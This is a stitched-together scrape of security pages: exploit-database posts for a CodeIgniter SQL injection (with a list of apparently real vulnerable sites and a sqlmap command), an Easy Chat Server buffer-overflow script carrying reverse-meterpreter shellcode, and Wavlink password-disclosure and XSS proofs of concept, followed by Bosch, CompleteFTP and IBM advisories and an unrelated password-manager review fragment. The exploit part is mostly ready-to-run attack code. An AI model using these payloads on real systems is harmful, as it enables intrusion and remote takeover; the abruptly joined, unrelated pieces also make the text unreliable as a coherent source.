CodeIgniter CMS version 4.2.0 suffers from a remote SQL injection vulnerability.

    [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]                                                                                      [+]Exploit Title    : CodeIgniter CMS Version 4.2.0  Sql Injection Vulnerability                         [+]                                                                                         [+]Exploit Author   : E1.Coders                                           [+]                                                                                          [+]Vendor Homepage  : https://www.codeigniter.com/                                       [+]                                                                                       [+]Google Dork ONE  : searchResult/?title=[+]    [+]Google Dork Two  : Job/searchResult/?title=  [+]                                                                                     [+]Date             : 15 / 05 / 2022                                                                [+]                                                                                     [+]Tested On        : windows + linux                                              [+]                                                                                        [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>DESCRITION   <~ ~ ~ [+] [+] CodeIgniter CMS suffers from a remote SQL injection vulnerability. [+] "codeigniter vulnerability ::$DATA view source code"[+] Note that this find contains information about the site.[+] CodeIgniter CMS SQL injection vulnerabilities were found and confirmed in the software as an anonymous user.[+] A successful attack could allow an unknown attacker to access information such as username and password hashes stored in the database.[+] The following URLs and parameters have been confirmed to suffer from SQL injection.                                                                                        [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>  Location   <~ ~ ~                           [+] SQL ERROR Location                                                                                        [+] http://www.site.com/Job/searchResult/?title=[SQL]                                              [+] [+]~ ~ ~~ ~ ~~  ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~>   DEMO      <~ ~ ~                       [+][+][+] ERROR : https://[removed].com/Job/searchResult/?title=123%27[+][+] ERROR : https://[removed].com/Job/city/%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85-%D9%85%D8%B4%D9%87%D8%AF'  (OR= or ==)[+][+] ERROR : https://[removed].ir/?per_page=400%2[+][+] ERROR : https://[removed].ir/Job/search/NULL/%D8%A2%D8%A8%D8%A7%D8%AF%D8%A7%D9%86'/NULL/NULL/0[+] [+] ERROR : https://[removed].com/login/       (username = '  Password = ')[+][+] ERROR : https://[removed].com/search.php?search=1'[+][+] ERROR : https://[removed].com/news.php?p=7251'[+][+] ERROR : https://[removed].com/employe/show.php?cvid=14088'[+][+] ERROR : https://[removed].com/states/%D8%AA%D9%87%D8%B1%D8%A7%D9%86'[+][+] ERROR : https://[removed].com/fa/index.asp?p=search&search=1[+][+] ERROR : https://[removed].com/fa/FormView/1026'[+][+] ERROR : https://[removed].com/fa/formview/1030' [+] And Google More . . . \ .[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  Methode Attack :[+]  [+] Step 1 : Enter the URL of the page that has the problem of sql injection attacks[+] [+] Step 2 :  Add a variable "  OR ' to the end of  the URL "request"[+] To display the PHP error related to not controlling the functions that cause the attacker to attack  '[+] [+] Step 3 :  Use sqlmap: python sqlmap.py -u "https://[removed].com/Job/searchResult/?title=123"[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] About CMS :[+] [+] Codeigniter is an open source web software framework used to build dynamic websites. [+] This framework, which is written in PHP language, [+] accelerates the development of software by coding from the beginning. This acceleration is done by the framework's libraries, [+] many of which make common tasks simple. The first public release of CodeIgniter was on February 28, 2006[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Explanation of vulnerability :[+] [+] The remote attacker can test the SQL Inject attack by injecting a 'variable' and after displaying the PHP error related to not controlling the functions that cause the SQL Inject attack[+] And the attacker can execute attacks with SQL Inject commands or execute attacks with ready tools such as Squat Map.[+] [+] All different parts of the site have this security problem[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Solution :[+] [+] [+] Use parameter input validation to be modified to prevent attacks[+] "codeigniter vulnerability ::$DATA view source code"[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

CodeIgniter CMS 4.2.0 SQL Injection

Easy Chat Server version 3.1 remote stack buffer overflow exploit.

    # Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)# Exploit Author: r00tpgp @ http://www.r00tpgp.com# Usage: python easychat-exploit.py <victim-ip> <port># Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990# CVE: CVE-2004-2466 # Installer: http://www.echatserver.com/# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)#!/usr/bin/pythonimport sys, socket, time host = sys.argv[1] # Recieve IP from userport = int(sys.argv[2]) # Recieve Port from user #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20"buf =  ""buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29"buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f"buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30"buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3"buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e"buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82"buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07"buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51"buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39"buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38"buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a"buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f"buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56"buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97"buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c"buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9"buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09"buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7"buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0"buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36"buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1"buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33"buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56"buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33"buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82"buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa"buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95"buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4"junk = "A"*217nseh = "\xeb\x06\x90\x90" # short jump 6 bytesseh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLLnops = "\x90"*16header = (        "GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n"        "User-Agent: Mozilla/4.0\r\n"        "Host: 192.168.1.136:80\r\n"        "Accept-Language: en-us\r\n"        "Accept-Encoding: gzip, deflate\r\n"        "Referer: http://192.168.1.136\r\n"        "Connection: Keep-Alive\r\n\r\n"        )client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socketclient.connect((host, port)) # Connect to user supplied port and IP addressclient.send(header) # Send the user command with a variable length nameclient.close() # Close the Connection

Easy Chat Server 3.1 Buffer Overflow

Wavlink WN530HG4 suffers from a password disclosure vulnerability.

Change Mirror Download

    # Exploit Title: Wavlink WN530HG4 - Password Disclosure# Date: 2022-06-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: M30HG4.V5030.191116# Vendor home page : wavlink.com# Authentication Required: No# CVE : CVE-2022-34047# Tested on: Windows# Exploitview-source:http://IP_address/set_safety.shtml?r=52300search for var syspasswd="you will find the username and the password

Wavlink WN530HG4 Password Disclosure

Wavlink WN533A8 suffers from a password disclosure vulnerability.

Change Mirror Download

    # Exploit Title: Wavlink WN533A8 - Password Disclosure# Date: 2022-06-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: M33A8.V5030.190716# Vendor home page : wavlink.com# Authentication Required: No# CVE : CVE-2022-34046# Tested on: Windows# Exploitview-source:http://IP_ADDRESS/sysinit.shtmlsearch for var syspasswd="you will find the username and the password

Wavlink WN533A8 Password Disclosure

Wavlink WN533A8 suffers from a cross site scripting vulnerability.

# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: M33A8.V5030.190716# Vendor home page : wavlink.com# Authentication Required: No# CVE : CVE-2022-34048# Tested on: Windows# Poc code<html>    <body>  <script>history.pushState('', '', '/')</script>    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">      <input type="hidden" name="newUI" value="1" />      <input type="hidden" name="page" value="login" />      <input type="hidden" name="username" value="admin" />      <input type="hidden" name="langChange" value="0" />     <input type="hidden" name="ipaddr" value="196.219.234.10" />      <input type="hidden" name="login_page" value="x");alert(9);x=("" />      <input type="hidden" name="homepage" value="main.shtml" />      <input type="hidden" name="sysinitpage" value="sysinit.shtml" />      <input type="hidden" name="wizardpage" value="wiz.shtml" />      <input type="hidden" name="hostname" value="59.148.80.138" />      <input type="hidden" name="key" value="M94947765" />      <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />      <input type="hidden" name="lang_select" value="en" />      <input type="submit" value="Submit request" />    </form>  </body></html>

Wavlink WN533A8 Cross Site Scripting

File path manipulation vulnerability in BF-OS version 3.00 up to and including 3.83 allows an attacker to modify the file path to access different resources, which may contain sensitive information.

**Advisory Information**

*   **Advisory ID:** BOSCH-SA-013924-BT
*   **CVE Numbers and CVSS v3.1 Scores:**
    *   CVE-2022-36301
        *   Base Score: 9.8 (Critical)
    *   CVE-2022-36302
        *   Base Score: 8.8 (High)
*   **Published:** 01 Aug 2022
*   **Last Updated:** 01 Aug 2022

**Summary**

Multiple vulnerabilities were identified in BF-OS version 3.x up to and including 3.83 used by Bigfish V3 and PR21 (Energy Platform) devices and Bigfish VM image, which are part of the data collection infrastructure of the Energy Platform solution.

The most critical vulnerability may allow an unauthenticated remote attacker to gain administrative privileges to the device by brute-forcing a weak password. The second vulnerability may allow a remote authenticated attacker to gain unauthorized read access to local operating system files outside the web server root.

Both vulnerabilities are closed with BF-OS version 3.84, which Bosch will install remotely to affected customers after agreeing on a suitable maintenance window. Affected customers do not have to take further action.

The vulnerabilities were identified in an internal penetration test. Bosch is currently not aware of exploitation of these vulnerabilities in the wild.

**Affected Products**

*   Bosch BF-OS 3.0 <= 3.83 on: Bigfish V3 (Linux)
*   Bosch BF-OS 3.0 <= 3.83 on: PR21 (Linux)
*   Bosch BF-OS 3.0 <= 3.83 on: VM (Windows)

**Solution and Mitigations****Software Update**

Update to BF-OS version 3.84 or greater to close these vulnerabilities.

Bosch will contact all affected customers individually and push this new version to affected devices after having agreed on a customer-specific maintenance window. The installation takes approximately half an hour and during this time measurement data cannot be captured.

The update results in the following changes to the affected devices:

*   The devices will enforce a sufficiently long and complex password to protect against unauthorized access.
    
*   Each customer will receive a list of new initial passwords for his devices.
    
*   Connecting to a device from the Energy Platform software requires entering the device password.
    

Customers can verify that the update has been installed successfully by verifying the version in the device overview of the Energy Platform software.

**Vulnerability Details****CVE-2022-36301**

CVE description: BF-OS version 3.x up to and including 3.83 do not enforce strong passwords which may allow a remote attacker to brute-force the device password.

*   Problem Type:
    *   CWE-521 Weak Password Requirements
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    *   Base Score: 9.8 (Critical)

**CVE-2022-36302**

CVE description: File path manipulation vulnerability in BF-OS version 3.00 up to and including 3.83 allows an attacker to modify the file path to access different resources, which may contain sensitive information.

*   Problem Type:
    *   CWE-641 Improper Restriction of Names for Files and Other Resources
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    *   Base Score: 8.8 (High)

**Remarks****Security Update Information**

With respect to Directive (EU) 2019/770 and Directive (EU) 2019/771 and their national transposition laws, please note:

It is your responsibility to download and/or install any security updates provided by us, for example to maintain product or data security. If you fail to install a security update provided to you within a reasonable period of time, we will not be liable for any product defect solely due to the absence of such security update.

Alternatively, we are entitled to directly download and/or install security updates regardless of your settings. In these cases, we will provide you with the relevant information, e.g. in this security advisory.

**CVSS Scoring**

Vulnerability classification has been performed using the CVSS v3.1 scoring system . The CVSS environmental score is specific to each customer’s environment and should be defined by the customer to attain a final scoring.

**Additional Resources**

Please contact the Bosch PSIRT if you have feedback, comments, or additional information about this vulnerability at: psirt@bosch.com .

**Revision History**

*   01 Aug 2022: Initial Publication

CVE-2022-36302: Multiple Vulnerabilities in BF-OS

Security issue fixed in version 22.1.1 of file transfer software

James Walker 01 August 2022 at 13:14 UTC

Security issue fixed in version 22.1.1 of file transfer software

A security vulnerability in file transfer software CompleteFTP allowed unauthenticated attackers to delete arbitrary files on affected installations.

Developed by EnterpriseDT of Australia, CompleteFTP is a proprietary FTP and SFTP server for Windows that supports FTPS, SFTP, and HTTPS.

A security researcher with the handle rgod discovered a flaw in the class that results from the lack of proper validation of a user-supplied path prior to using it in file operations.

Read more of the latest enterprise security news

“This vulnerability allows remote attackers to delete arbitrary files on affected installations of EnterpriseDT CompleteFTP server,” a security advisory explains.

“An attacker can leverage this vulnerability to delete files in the context of SYSTEM.”

The issue was assigned CVE-2022-2560 and was fixed in CompleteFTP version 22.1.1.

This release includes other security enhancements in the form of SHA-2 cryptographic hash function for RSA signatures and a new format for PuTTY private keys.

_The Daily Swig_ has approached EnterpriseDT for comment.

**YOU MIGHT ALSO LIKE** GitHub Actions workflow flaws provided write access to projects including Logstash

CompleteFTP path traversal flaw allowed attackers to delete server files

Keep your logins locked down with our favorite apps for PC, Mac, Android, iPhone, and web browsers.

Bitwarden offers a paid upgrade account. The cheapest of the bunch, Bitwarden Premium, is $10 per year. That gets you 1 GB of encrypted file storage, two-factor authentication with devices like YubiKey, FIDO U2F, Duo, and a password hygiene and vault health report. Paying also gets you priority customer support.

_After signing up,_ _download the app_ _for Windows, MacOS, Android, iOS, or Linux. There are also browser extensions for_ _Firefox, Chrome, Safari, Edge, Vivaldi, and Brave__._

Best Full-Featured Manager

Courtesy of Dashlane

I first encountered Dashlane several years ago. Back then, it was the same as its competitors with no standout attributes. But recent updates have added several helpful features. One of the best is Site Breach Alerts, something other services have since added as well. Dashlane actively monitors the darker corners of the web, looking for leaked or stolen personal data, and then alerts you if your information has been compromised.

Setup and migration from another password manager is simple, and you’ll use a secret key to encrypt your passwords, much like 1Password’s setup process. In practice, Dashlane is very similar to the others in this list. The company did discontinue its desktop app earlier this year, moving to a web-based user interface, which is a little different than 1Password and Bitwarden. (The desktop apps officially shut down on January 10, 2022.) I primarily use passwords in the web browser anyway, and Dashlane has add-ons for all the major browsers, along with iOS and Android apps. If a desktop app is important to you, it’s something to be aware of. Dashlane offers a 30-day free trial, so you can test it out before committing.

_After signing up,_ _download the app_ _for Android and iOS, and grab the browser extensions for_ _Firefox, Chrome, and Edge__._

Best DIY Option (Self-Hosted)

Courtesy of KeePassXC

Want to retain more control over your data in the cloud? Try using a desktop application like KeePassXC. It stores encrypted versions of all your passwords into an encrypted digital vault that keeps you secure with a master password, a key file, or both. The difference is that instead of a hosted service like 1Password syncing it for you, you sync that database file yourself using a file-syncing service like Dropbox or Edward Snowden’s recommended service, SpiderOak. Once your file is in the cloud, you can access it on any device that has a KeePassXC client.

Why do it yourself? In a word: transparency. Like Bitwarden, KeepassXC is open source, which means its code can be and has been inspected for critical flaws.

_Download the_ _desktop app_ _for Windows, MacOS, or Linux and create your vault. There are also extensions for_ _Firefox__,_ _Edge__, and_ _Chrome__. It does not have official apps for your phone. Instead, the project recommends_ _KeePass2Android_ _or_ _Strongbox for iPhone__._

Another Option

Courtesy of NordPass

NordPass is a relatively new kid on the password manager block, but it comes from a company with significant pedigree. NordVPN is a well-known VPN provider, and the company brings to its password manager much of the ease of use and simplicity that made its VPN offering popular. The installation and setup process is a breeze. There are apps for every major platform (including Linux), browser, and device.

The free version of NordPass is limited to one device, and there’s no syncing available. There is a seven-day free trial of the premium version, which lets you test device syncing. But to get that for good, you’ll have to upgrade to the $36-a-year plan. (Like its VPN service, NordPass accepts payment in cryptocurrencies.)

You Need a Password Manager. Here Are the Best Ones

IBM Robotic Process Automation 21.0.0, 21.0.1, and 21.0.2 could allow a user to access information from a tenant of which they should not have access. IBM X-Force ID: 219391.

  

**Summary**

Security Bulletin: IBM Robotic Process Automation is vulnerable to an information disclosure (CVE-2022-22334)

**Vulnerability Details**

**CVEID:**   CVE-2022-22334  
**DESCRIPTION:**   IBM Robotic Process Automation could allow a user to access information from a tenant of which they should not have access.  
CVSS Base score: 4.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/219391 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Robotic Process Automation as a Service

All

IBM Robotic Process Automation

< 21.0.2.5

IBM Robotic Process Automation

< 21.0.1.7

  

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s)  
**

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

21.0.2

Download and install 21.0.2.5 (21.0.2 IF005)

IBM Robotic Process Automation

21.0.1

Download and install 21.0.1.7 (21.0.1 IF007)

IBM Robotic Process Automation as a Service

All

No action required as IBM Robotic Process Automation as a Service servers have been updated to 21.0.2 IF005 or higher.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

Mariana Penna (IBM)

**Change History**

12 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"}\],"Version":"21.0.0, 21.0.1, 21.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-22334: Security Bulletin: IBM Robotic Process Automation is vulnerable to an information disclosure (CVE-2022-22334)

IBM Robotic Process Automation 21.0.0, 21.0.1, and 21.0.2 contains a vulnerability that could allow IBM tenant credentials to be exposed. IBM X-Force ID: 227288.

  

**Summary**

Security Bulletin: IBM Robotic Process Automation is vulnerable to exposure of tenant credentials (CVE-2022-22505)

**Vulnerability Details**

**CVEID:**   CVE-2022-22505  
**DESCRIPTION:**   IBM Robotic Process Automation contains a vulnerability that could allow IBM tenant credentials to be exposed.  
CVSS Base score: 4.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/227288 for the current score.  
CVSS Vector: (CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Robotic Process Automation

< 21.0.3

IBM Robotic Process Automation for Cloud Pak

< 21.0.3

IBM Robotic Process Automation as a Service

All

  

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s)  
**

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

< 21.0.3

Download and install 21.0.3

IBM Robotic Process Auotmation for Cloud Pak

< 21.0.3

Download and Install 21.0.3

IBM Robotic Process Automation as a Service

All

No action required as IBM Robotic Process Automation as a Service servers have been updated to 21.0.3 or higher.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

18 Jun 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"}\],"Version":"21.0.0, 21.0.1, 21.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

Tag

#windows